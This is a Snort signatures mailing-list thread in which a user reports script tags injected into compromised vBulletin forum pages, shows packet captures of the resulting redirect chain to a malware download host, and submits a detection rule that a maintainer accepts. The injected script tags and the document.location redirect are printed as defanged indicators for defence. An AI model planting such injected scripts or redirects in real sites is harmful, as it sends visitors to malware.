Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Compromised vBulletin sig

From: Matt Mickel <mmickel () sourcefire com>
Date: Thu, 30 Apr 2015 14:49:42 -0400
Hi, James-

This rule has been reviewed and added to the community ruleset.  I 
removed the PCRE from the committed version and instead used the within 
content modifier.  This made the rule much more efficient while still 
detecting the relevant content.  Thanks so much for your submission.  
Cheers,

Matt Mickel

On 04/16/2015 01:30 PM, James Lay wrote:

Didn't see this in any current ruleset, so I thought I'd post it here.
Yesterday I saw two of these.  Injected into the vBulletin initial page:

<script type="text/javascript"
src="meow://meh[.]com/misc.php?v=364&amp;js=js"></script>
<script type="text/javascript"
src="meow://bleh[.]com/forums/misc.php?v=420&amp;js=js"></script>


#######################################################################################
GET /misc.php?v=364&js=js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer:
meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Accept-Encoding: gzip, deflate
Host: meh.com
Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507;
bblastactivity=0
Cache-Control: max-stale=0
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 15:58:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT;
path=/
Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT
X-Powered-By: PleskLin
Server: cloudflare-nginx
CF-RAY: 1d78da121f59012e-SJC
Content-Encoding: gzip

document.location='meow://filestore72[.]info/download.php?id=f823cc00'
#######################################################################################

This in turn goes to:

#######################################################################################
GET /download.php?id=f823cc00 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer:
meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Accept-Encoding: gzip, deflate
Host: filestore72[.]info
Cache-Control: max-stale=0
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.0.12
Date: Wed, 15 Apr 2015 15:53:40 GMT
Content-Type: text/html
Content-Length: 161
Connection: close
Location:
meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA==

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.0.12</center>
</body>
</html>
#######################################################################################


Seems to be old-ish news, but the sig is below:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS
(msg:"SERVER-WEBAPP Compromised vbulletin site";
flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v=";
uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui";
reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info;
classtype:bad-unknown; sid:10000156; rev:1;)

As usual, not sure if I have this perfect so anything to improve this
sig would be excellent.  Thank you.

James

------------------------------------------------------------------------------
BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
Develop your own process in accordance with the BPMN 2 standard
Learn Process modeling best practices with Bonita BPM through live exercises
http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_
source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!



------------------------------------------------------------------------------
One dashboard for servers and applications across Physical-Virtual-Cloud 
Widest out-of-the-box monitoring support with 50+ applications
Performance metrics, stats and reports that give you Actionable Insights
Deep dive visibility with transaction tracing using APM Insight.
http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
Previous By Date Next
Previous By Thread Next

Current thread: